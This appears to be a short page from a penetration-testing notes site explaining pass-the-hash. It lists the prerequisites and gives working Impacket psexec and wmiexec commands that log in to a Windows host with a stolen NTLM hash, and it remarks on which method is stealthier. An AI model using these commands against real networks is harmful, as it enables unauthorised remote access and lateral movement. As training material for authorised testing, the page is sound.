search

Pass the Hash

hashtag
Pass the Hash

Allow attackers to authenticate using NTLM hash. This works for systems using NTLM authentication only. Tools that can be used are:

  1. PsExec from Metasploit

  2. Passing-the-hash toolkit

  3. Impacket

Tools Communicate using named pipes (Service control manager API).

To use this tool three requirements must be fulfilled.

  1. Connection to SMB must be able to establish.

  2. The Windows File and Printer Sharing feature needs to be enabled.

  3. Must use user credentials with local administrative privilege. (As it writes to ADMIN$ Share).

hashtag
Type 1: Using Tool psexec

impacket-psexec corp/[email protected] -hashes :2892D26CDF84D7A70E2EB3B9F05C425E

hashtag
Type 2: Using wmiexec

# Command:
impacket-wmiexec corp/[email protected] -hashes :2892D26CDF84D7A70E2EB3B9F05C425E
circle-info

wmiexec: Stealthier, uses WMI, doesn’t create a service.

psexec: More powerful, but more detectable, creates a service to execute commands.

PreviousPSexec ToolNextOverpass the Hash

Last updated